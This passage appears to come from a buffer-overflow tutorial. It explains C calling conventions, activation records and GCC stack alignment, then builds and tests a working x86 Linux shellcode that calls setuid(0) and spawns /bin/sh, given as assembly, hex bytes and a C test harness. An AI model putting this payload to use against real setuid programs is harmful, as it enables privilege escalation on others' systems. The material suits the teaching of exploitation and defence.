3.5 C Function Call Convention
3.6 Stack Boundary Alignment
3.7 Generating and Testing the Shellcode as a Payload
3.5 C Function Call Convention
To understand how the stack operates, it helps to examine how a function call works and how the stack frame for a function is constructed and destroyed, seen from the programming language perspective. By convention, every C function call [60], [61] creates a stack frame. A convention here is an established, widely followed practice rather than a formally published standard. Compilers follow such conventions for function calls. They are not arbitrary, however: as discussed in section 2.5.3, the conventions used must be in accordance with the processor’s execution environment. For example, a C function calling convention tells the compiler things such as:
1. The order in which function arguments are pushed onto the stack.
2. Whether the caller or the called function (callee) is responsible for removing the arguments from the stack at the end of the call, that is, the stack cleanup process.
3. The name-decorating convention that the compiler uses to identify individual functions.
Examples of calling conventions used in C compilers are __stdcall, __pascal, __cdecl and __fastcall (for Microsoft Visual C++). The calling convention is part of a function's signature, so functions with different calling conventions are incompatible with each other. Currently, there is no standard for C name decoration between different compiler vendors, or even between different versions of the same compiler. That is why object files produced by different compilers may not share the same naming scheme, and linking them together can fail with unresolved external symbols. For Borland and Microsoft compilers, a specific calling convention can be written between the return type and the function's name, for example int __cdecl func(int arg); (func is an illustrative name).
For GNU GCC, the __attribute__ keyword can be used: write the function declaration, followed by the keyword __attribute__ and the calling convention in double parentheses, for example int func(int arg) __attribute__((cdecl)); (func is an illustrative name).
The following table summarizes the C function calling conventions used in modern compilers, whether commercial or open source.
Table 3.1: C function calling conventions
Keyword | Stack cleanup | Parameter passing |
__cdecl | caller | - Pushes parameters on the stack in reverse order (right to left). - Caller cleans up the stack. - This is the default calling convention for C and C++ programs, and it supports variadic functions (a variable number of arguments, as in printf()). - The __cdecl calling convention creates larger executables than __stdcall, because it requires each function call to include stack cleanup code. |
__stdcall | callee | - Pushes parameters on the stack in reverse order (right to left). - Callee cleans up the stack. - Functions that use this calling convention require a function prototype. - It is the standard convention used in Win32 API functions; the Win32 WINAPI and PASCAL macros expand to it. It differs from the original __pascal convention, which pushes parameters left to right. |
__fastcall | callee | - Arguments are passed in registers when possible; with Microsoft Visual C++ the first two arguments that fit are placed in ECX and EDX. - The remaining parameters are pushed on the stack right to left. - Callee cleans up the stack. |
Each instance of a function call has its own frame (more generally called an activation record) on the stack. The types of data that may be present in an activation record are shown in Figure 3.14, and Table 3.2 describes them. General information and details of specific programming language implementations can be found in [60], [61].
Figure 3.14: General types of data that might appear in an activation record
Table 3.2: Activation record data description
Data | Description |
Temporary values | Values such as those produced by the evaluation of expressions, in cases when they cannot be held in registers. |
Local data | Data belonging to the function that owns the activation record. |
A saved machine status | Information about the state of the machine just before the call to the function. Typically includes the return address (value of the program counter, to which the called function must return) and the contents of registers that were used by the caller and must be restored when the return occurs. |
An access link | May be needed to locate data that the called function needs but that is found elsewhere, e.g. in another activation record. |
A control link | Points to the activation record of the caller. |
Space for the return value | Holds the value returned by the called function, if any. Not all called functions return a value, and when one does, it may be preferable to place that value in a register for efficiency. |
The actual parameters | Supplied by the caller to the called function. Normally passed in registers, when possible. |
Specific to C, the code executed by the caller immediately before and after the function call is normally called the “calling sequence”. The code executed at the beginning of the called function is normally called the prologue, and the code executed at its end is normally called the epilogue. In practice, a C function call is made by the caller pushing the arguments onto the stack, calling the function and then popping the stack to clean up the pushed arguments. The following generic assembly code snippets show __cdecl and __stdcall examples, and they should tally with the processor’s execution environment for stack setup discussed in section 2.5.3.3.
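/* example of __cdecl */
push arg_2
push arg_1
call function ; pushes the return address, stack frame setup follows
add esp, 8 ; stack cleanup by the caller (two 4-byte arguments)
...
function:
sub esp, 12 ; allocated buffer
...
add esp, 12 ; buffer de-allocated
ret ; the arguments are left for the caller to remove
/* example of __stdcall */
push arg_2
push arg_1
call function ; pushes the return address, stack frame setup follows
... ; no stack cleanup by the caller
function:
sub esp, 12 ; allocated buffer
...
add esp, 12 ; buffer de-allocated
ret 8 ; stack cleanup by the callee (two 4-byte arguments)
These assembly snippets explain how the stack frame is constructed during the function call as depicted in Figure 4. In both cases the called function subtracts 12 bytes from esp for the buffer allocation and adds the 12 bytes back for the de-allocation before it returns. The conventions differ in who removes the 8 bytes of arguments: with __cdecl the caller adds 8 to esp after the call returns, whereas with __stdcall the callee removes them with ret 8. If a calling convention is not explicitly stated or set, the default, __cdecl, is used, and this is what most programmers normally rely on. The following figure shows the default calling convention setting in the Microsoft Visual Studio IDE.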
Figure 3.15: C calling convention setting in Microsoft Visual Studio IDE
Back to the vulnerable code, the difference between the buffer actually allocated and the declared buffer should be noted. In the program, an array of 512 bytes was declared, which is supposed to hold at most 512 char elements. However, the compiler may reserve more stack space than that, depending on its preferred stack boundary, which defaults to 4 (2 to the power of 4, or 16 bytes) for this GCC version. This can be verified by disassembling the compiled program.
[amad@localhost projectbof11]$ gdb -q bofvulcode
(gdb) disas main
Dump of assembler code for function main:
0x08048424 <main+0>: lea 0x4(%esp),%ecx
0x08048428 <main+4>: and $0xfffffff0,%esp
0x0804842b <main+7>: pushl -0x4(%ecx)
0x0804842e <main+10>: push %ebp
0x0804842f <main+11>: mov %esp,%ebp
0x08048431 <main+13>: push %ecx
0x08048432 <main+14>: sub $0x214,%esp
0x08048438 <main+20>: mov %ecx,-0x208(%ebp)
0x0804843e <main+26>: mov -0x208(%ebp),%eax
0x08048444 <main+32>: cmpl $0x1,(%eax)
0x08048447 <main+35>: jg 0x8048470 <main+76>
0x08048449 <main+37>: mov -0x208(%ebp),%edx
0x0804844f <main+43>: mov 0x4(%edx),%eax
0x08048452 <main+46>: mov (%eax),%eax
0x08048454 <main+48>: mov %eax,0x4(%esp)
0x08048458 <main+52>: movl $0x8048584,(%esp)
0x0804845f <main+59>: call 0x8048344 <printf@plt>
0x08048464 <main+64>: movl $0x0,(%esp)
0x0804846b <main+71>: call 0x8048354 <exit@plt>
0x08048470 <main+76>: mov -0x208(%ebp),%edx
0x08048476 <main+82>: mov 0x4(%edx),%eax
0x08048479 <main+85>: add $0x4,%eax
0x0804847c <main+88>: mov (%eax),%eax
0x0804847e <main+90>: mov %eax,0x4(%esp)
0x08048482 <main+94>: lea -0x204(%ebp),%eax
0x08048488 <main+100>: mov %eax,(%esp)
0x0804848b <main+103>: call 0x8048334 <strcpy@plt>
0x08048490 <main+108>: lea -0x204(%ebp),%eax
0x08048496 <main+114>: mov %eax,0x4(%esp)
0x0804849a <main+118>: movl $0x80485a7,(%esp)
0x080484a1 <main+125>: call 0x8048344 <printf@plt>
0x080484a6 <main+130>: mov $0x0,%eax
0x080484ab <main+135>: add $0x214,%esp
0x080484b1 <main+141>: pop %ecx
0x080484b2 <main+142>: pop %ebp
0x080484b3 <main+143>: lea -0x4(%ecx),%esp
0x080484b6 <main+146>: ret
End of assembler dump.
(gdb)
Figure 3.16: Viewing the ‘real’ allocated buffer for the declared array
It is clear that the stack space actually allocated is 0x214 bytes (532 bytes = 532 x 8 bits = 4256 bits; 4256/32 = 133 words), of which the declared array occupies the 512 bytes starting at ebp - 0x204. The default preferred stack boundary is 4 (2 to the power of 4, which equals 16 bytes or 128 bits) for this GCC version. This default can be changed by using the following GCC option.
-mpreferred-stack-boundary=num
With this option the compiler attempts to keep the stack boundary aligned to a 2 raised to num byte boundary. The stack is only required to be aligned on a 4-byte boundary, but with the default value of 4 GCC keeps it aligned on a 16-byte boundary. Referring to the GCC documentation:
"To ensure proper alignment of these values on the stack, the stack boundary must be as aligned as that required by any value stored on the stack. Further, every function must be generated such that it keeps the stack aligned. Thus calling a function compiled with a higher preferred stack boundary from a function compiled with a lower preferred stack boundary will most likely misalign the stack. It is recommended that libraries that use callbacks always use the default setting.
This extra alignment does consume extra stack space. Code that is sensitive to stack space usage, such as embedded systems and operating system kernels, may want to reduce the preferred alignment to '-mpreferred-stack-boundary=2'."
This matters when the malicious code is stored on the stack itself, as in the classic stack-based buffer overflow. The space actually allocated for the declared array needs to be known so that the size and arrangement of the input string can be prepared properly. When the return address is made to point back into the stack’s buffer, two options are available:
1. Use the -mpreferred-stack-boundary=num GCC option to lower the preferred stack boundary, or
2. Pad the shellcode with more No Operation (NOP) instructions.
In this demo the preferred stack boundary will be lowered to 2. The steps for this task are shown below.
[amad@localhost projectbof11]$ gcc -w -g -mpreferred-stack-boundary=2 bofvulcode.c -o bofvulcode
[amad@localhost projectbof11]$ gdb -q bofvulcode
(gdb) disas main
Dump of assembler code for function main:
0x08048424 <main+0>: push %ebp
0x08048425 <main+1>: mov %esp,%ebp
0x08048427 <main+3>: sub $0x208,%esp
0x0804842d <main+9>: cmpl $0x1,0x8(%ebp)
0x08048431 <main+13>: jg 0x8048454 <main+48>
0x08048433 <main+15>: mov 0xc(%ebp),%eax
0x08048436 <main+18>: mov (%eax),%eax
0x08048438 <main+20>: mov %eax,0x4(%esp)
0x0804843c <main+24>: movl $0x8048554,(%esp)
0x08048443 <main+31>: call 0x8048344 <printf@plt>
0x08048448 <main+36>: movl $0x0,(%esp)
0x0804844f <main+43>: call 0x8048354 <exit@plt>
0x08048454 <main+48>: mov 0xc(%ebp),%eax
0x08048457 <main+51>: add $0x4,%eax
0x0804845a <main+54>: mov (%eax),%eax
0x0804845c <main+56>: mov %eax,0x4(%esp)
0x08048460 <main+60>: lea -0x200(%ebp),%eax
0x08048466 <main+66>: mov %eax,(%esp)
0x08048469 <main+69>: call 0x8048334 <strcpy@plt>
0x0804846e <main+74>: lea -0x200(%ebp),%eax
0x08048474 <main+80>: mov %eax,0x4(%esp)
0x08048478 <main+84>: movl $0x8048577,(%esp)
0x0804847f <main+91>: call 0x8048344 <printf@plt>
0x08048484 <main+96>: mov $0x0,%eax
0x08048489 <main+101>: leave
0x0804848a <main+102>: ret
End of assembler dump.
(gdb)
Figure 3.17: Viewing the ‘real’ allocated buffer after lowering the preferred stack boundary
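With the boundary lowered, 0x208 (520) bytes are allocated for the declared 512-byte buffer: the buffer starts at ebp - 0x200, and the remaining 8 bytes hold the two outgoing arguments that are written at (%esp) and 0x4(%esp) before each call. This issue does not affect the program used in this demonstration, because the vulnerable program’s stack is not used to store the malicious shellcode; an environment variable will be used instead. However, this knowledge is important for determining the exact location of the saved return address (ebp + 4).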
The shellcode used in this demo is a typical one that calls setuid and spawns a shell. Various types of shellcode can be generated easily using the Metasploit framework [52]. Take note that the assembly is written in AT&T syntax rather than Intel syntax. Basically, this shellcode contains three parts: displaying some characters, executing setuid(0) and invoking /bin/sh. To ensure that the root privilege of the vulnerable setuid program is retained, setuid(0) is run before invoking /bin/sh. The assembly code (testasm.s) is shown in the following code listing; it is a modified version of the code in [62]. The comments should be self-explanatory. Assembly is used because it gives a small file size and fast execution.
# using the .data section for write permission
# instead of .text section
.section .data
.globl _start
_start:
# displaying some characters for watermarking :-)
xor %eax,%eax # clear eax by setting eax to 0
xor %ebx,%ebx # clear ebx by setting ebx to 0
xor %edx,%edx # clear edx by setting edx to 0
push %ebx # push ebx (now 0) onto the stack,
# these null bytes follow
# the string in memory
push $0xa696e55 # push "Uni\n" (bytes stored little-endian)
push $0x4d555544 # push "DUUM"
push $0x414d4841 # push "AHMA"
movl %esp,%ecx # copy esp, the address of the string, to ecx
movb $0xf,%dl # move 15 to dl (low byte of edx), it is the
# number of bytes to write,
# notice the use of movb - move byte,
# this is to avoid null
movb $0x4,%al # move 4 to al (low byte of eax),
# 4 is system call
# number for write(int fd, char *str,
# int len)
int $0x80 # call kernel/syscall
# setuid(0)
xor %eax,%eax # clear eax by setting eax to 0
xor %ebx,%ebx # clear ebx by setting ebx to 0
xor %ecx,%ecx # clear ecx by setting ecx to 0
movb $0x17,%al # move 0x17 into al - setuid(0)
int $0x80 # call kernel/syscall
jmp do_call # jump to get the address with
# the call trick
jmp_back:
pop %ebx # ebx now holds the address of our
# string (the return address pushed
# by call), use it to index
xor %eax,%eax # clear eax by setting eax to 0
movb %al,7(%ebx) # put a null at the N or shell[7]
movl %ebx,8(%ebx) # put the address of our
# string (in ebx) into shell[8]
movl %eax,12(%ebx) # put the null at shell[12]
# our string now looks something like
# "/bin/sh\0(*ebx)(*0000)"
xor %eax,%eax # clear eax by setting eax to 0
movb $11,%al # put 11 which is execve
# syscall number into al
leal 8(%ebx),%ecx # put the address of XXXX
# i.e. (*ebx) into ecx
leal 12(%ebx),%edx # put the address of YYYY
# i.e. (*0000) into edx
int $0x80 # call kernel/syscall
do_call:
call jmp_back
shell:
.ascii "/bin/shNXXXXYYYY"
Figure 3.18: The shellcode file content screenshot
Next, assemble, link and run the assembly program to verify that it does what is intended. The following steps show how to assemble the source, link the object file and run the binary.
[amad@localhost testassembly]$ as testasm.s -o testasm.o
[amad@localhost testassembly]$ ld testasm.o -o testasm
[amad@localhost testassembly]$ ./testasm
AHMADUUMUni
sh-3.2$ pwd
/home/amad/Public/testassembly
sh-3.2$ exit
exit
It looks like the assembly works fine. Next, to get the opcodes, the binary needs to be dumped using the objdump tool. These opcodes will be used in the next C program as a char array of hex values. Take note that the assembly code can also be used directly in a C program through the asm keyword; however, the program will be larger. The following listing shows the steps.
[amad@localhost testassembly]$ objdump -D testasm
testasm: file format elf32-i386
Disassembly of section .data:
08049054 <_start>:
8049054: 31 c0 xor %eax,%eax
8049056: 31 db xor %ebx,%ebx
8049058: 31 d2 xor %edx,%edx
804905a: 53 push %ebx
804905b: 68 55 6e 69 0a push $0xa696e55
8049060: 68 44 55 55 4d push $0x4d555544
8049065: 68 41 48 4d 41 push $0x414d4841
804906a: 89 e1 mov %esp,%ecx
804906c: b2 0f mov $0xf,%dl
804906e: b0 04 mov $0x4,%al
8049070: cd 80 int $0x80
8049072: 31 c0 xor %eax,%eax
8049074: 31 db xor %ebx,%ebx
8049076: 31 c9 xor %ecx,%ecx
8049078: b0 17 mov $0x17,%al
804907a: cd 80 int $0x80
804907c: eb 18 jmp 8049096 <do_call>
0804907e <jmp_back>:
804907e: 5b pop %ebx
804907f: 31 c0 xor %eax,%eax
8049081: 88 43 07 mov %al,0x7(%ebx)
8049084: 89 5b 08 mov %ebx,0x8(%ebx)
8049087: 89 43 0c mov %eax,0xc(%ebx)
804908a: 31 c0 xor %eax,%eax
804908c: b0 0b mov $0xb,%al
804908e: 8d 4b 08 lea 0x8(%ebx),%ecx
8049091: 8d 53 0c lea 0xc(%ebx),%edx
8049094: cd 80 int $0x80
08049096 <do_call>:
8049096: e8 e3 ff ff ff call 804907e <jmp_back>
0804909b <shell>:
804909b: 2f das
804909c: 62 69 6e bound %ebp,0x6e(%ecx)
804909f: 2f das
80490a0: 73 68 jae 804910a <_end+0x5e>
80490a2: 4e dec %esi
80490a3: 58 pop %eax
80490a4: 58 pop %eax
80490a5: 58 pop %eax
80490a6: 58 pop %eax
80490a7: 59 pop %ecx
80490a8: 59 pop %ecx
80490a9: 59 pop %ecx
80490aa: 59 pop %ecx
[amad@localhost testassembly]$
Figure 3.19: Dumping the Hex representation using objdump tool
Then, re-arrange the opcodes as a string of hex escapes. There must be no null byte, \x00 (the string terminator), in this shellcode, because string handling such as strcpy() in the vulnerable program stops at the first null and would truncate the shellcode. In a real exploit, the shellcode should be as small as possible, because the space available for storing it is usually limited; a smaller shellcode also executes faster.
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x44\x55"
"\x55\x4d\x68\x41\x48\x4d\x41\x89\xe1\xb2\x0f\xb0\x04\xcd\x80\x31"
"\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x18\x5b\x31\xc0\x88\x43"
"\x07\x89\x5b\x08\x89\x43\x0c\x31\xc0\xb0\x0b\x8d\x4b\x08\x8d\x53"
"\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e"
"\x58\x58\x58\x58\x59\x59\x59\x59"
Next, use this shellcode as a char array in the C program (testmyasm.c) for testing as shown in the following code.
#include <stdlib.h> /* for exit() */
#include <unistd.h>
char shcode[] = "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x44\x55"
"\x55\x4d\x68\x41\x48\x4d\x41\x89\xe1\xb2\x0f\xb0\x04\xcd\x80\x31"
"\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x18\x5b\x31\xc0\x88\x43"
"\x07\x89\x5b\x08\x89\x43\x0c\x31\xc0\xb0\x0b\x8d\x4b\x08\x8d\x53"
"\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e"
"\x58\x58\x58\x58\x59\x59\x59\x59";
int main(int argc, char **argv)
{
int (*ret)(); /* creating a function pointer, ret */
ret = (int(*)())shcode; /* ret points to our shellcode, which is
cast to a function */
(int)(*ret)(); /* execute shcode[] as a function */
exit(0); /* exit peacefully */
}
Then, compile and run this program as shown in the following steps.
[amad@localhost testassembly]$ gcc -w -g testmyasm.c -o testmyasm
[amad@localhost testassembly]$ ./testmyasm
AHMADUUMUni
sh-3.2$ id
uid=500(amad) gid=500(amad) groups=500(amad)
sh-3.2$ whoami
amad
sh-3.2$
sh-3.2$
sh-3.2$ exit
exit
[amad@localhost testassembly]$
Figure 3.20 shows the screenshot for the previous task.
Figure 3.20: Screenshot for the shellcode testing
The shellcode works fine, so the NXXXXYYYY portion after /bin/sh can be discarded; it was there only to make the assembly coding easier, by marking where the null terminator and the two pointers are written and by reserving the necessary space. After removing that part of the string, the remaining shellcode is shown below.
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x44\x55\x55"
"\x4d\x68\x41\x48\x4d\x41\x89\xe1\xb2\x0f\xb0\x04\xcd\x80\x31\xc0"
"\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x18\x5b\x31\xc0\x88\x43\x07"
"\x89\x5b\x08\x89\x43\x0c\x31\xc0\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c"
"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
Re-compile and re-run the program with this slightly smaller shellcode.
[amad@localhost testassembly]$ cat asmshellcodefinal.c
#include <stdlib.h> /* for exit() */
#include <unistd.h>
char shcode[] = "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x44\x55\x55"
"\x4d\x68\x41\x48\x4d\x41\x89\xe1\xb2\x0f\xb0\x04\xcd\x80\x31\xc0"
"\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x18\x5b\x31\xc0\x88\x43\x07"
"\x89\x5b\x08\x89\x43\x0c\x31\xc0\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c"
"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main(int argc, char **argv)
{
int (*ret)();
ret = (int(*)())shcode;
(int)(*ret)();
exit(0);
}
[amad@localhost testassembly]$ gcc -w -g asmshellcodefinal.c -o asmshellcodefinal
[amad@localhost testassembly]$ ./asmshellcodefinal
AHMADUUMUni
sh-3.2$
sh-3.2$
sh-3.2$ id
uid=500(amad) gid=500(amad) groups=500(amad)
sh-3.2$ whoami
amad
sh-3.2$ exit
exit
[amad@localhost testassembly]$
Figure 3.21: Running the shellcode screenshots
Well, the shellcode looks fine.